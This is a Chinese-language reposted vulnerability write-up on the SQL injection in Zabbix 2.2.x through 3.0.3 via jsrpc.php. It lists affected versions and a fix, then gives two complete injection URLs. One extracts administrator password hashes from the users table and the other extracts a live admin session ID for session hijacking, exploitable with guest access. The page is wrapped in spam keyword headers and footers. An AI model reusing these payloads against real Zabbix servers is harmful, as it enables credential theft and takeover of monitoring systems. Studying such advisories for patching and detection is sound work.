91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Zabbix 2.2.x / 2.4.x/ 3.0.0-3.0.3 - SQL Injection

發布時間:2020-04-17 09:36:49 來源:網絡 閱讀:1182 作者:serverxx0 欄目:安全技術

漏洞來源: http://seclists.org/fulldisclosure/2016/Aug/60

***成本:低

危害程度:

利用條件: 需要guest用戶權限(未登錄用戶都被設定為guest用戶的訪問權限)

影響范圍:2.2.x / 2.4.x/ 3.0.0-3.0.3

修復建議: 禁用guest用戶或者升級到3.0.4

漏洞利用:

   爆密碼

   sanr.com/zabbix/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2 and updatexml(1,concat(0x3a,(select passwd from zabbix.users limit 0,1)),1))%23&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1

輸出結果,如下表示漏洞存在:

  Zabbix 2.2.x / 2.4.x/ 3.0.0-3.0.3 - SQL Injection

輸出結果,如下表示禁用guest:

Zabbix 2.2.x / 2.4.x/ 3.0.0-3.0.3 - SQL Injection

 爆sessionid(在密碼破解不了情況下 可以使用session欺騙)

   需要取掉爆出來sessionid前面的數字1,在進行修改zbx_sessionid的值。

   sanr.com/zabbix/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select (1) from users where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (select concat(sessionid,0x7e,userid,0x7e,status) from sessions where status=0 and userid=1 LIMIT 0,1)),1,62)))a from information_schema.tables group by a)b))&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17

 

Zabbix 2.2.x / 2.4.x/ 3.0.0-3.0.3 - SQL Injection


Zabbix 2.2.x / 2.4.x/ 3.0.0-3.0.3 - SQL Injection

Zabbix 2.2.x / 2.4.x/ 3.0.0-3.0.3 - SQL Injection

zabbix具體版號查看

 2.x版本

    

Zabbix 2.2.x / 2.4.x/ 3.0.0-3.0.3 - SQL Injection

Zabbix 2.2.x / 2.4.x/ 3.0.0-3.0.3 - SQL Injection

  3.x版本

Zabbix 2.2.x / 2.4.x/ 3.0.0-3.0.3 - SQL Injection

Zabbix 2.2.x / 2.4.x/ 3.0.0-3.0.3 - SQL Injection

    


向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

揭西县| 扶沟县| 东乌珠穆沁旗| 易门县| 昔阳县| 栾川县| 海晏县| 沧源| 中西区| 图木舒克市| 乌拉特中旗| 津南区| 武山县| 桂林市| 久治县| 郴州市| 三原县| 卢湾区| 衡山县| 汉沽区| 莱西市| 改则县| 保德县| 仙桃市| 青铜峡市| 辽阳市| 新平| 玉树县| 筠连县| 普格县| 江永县| 涪陵区| 合江县| 宁陵县| 茂名市| 通海县| 莱州市| 尚义县| 京山县| 大港区| 乐昌市|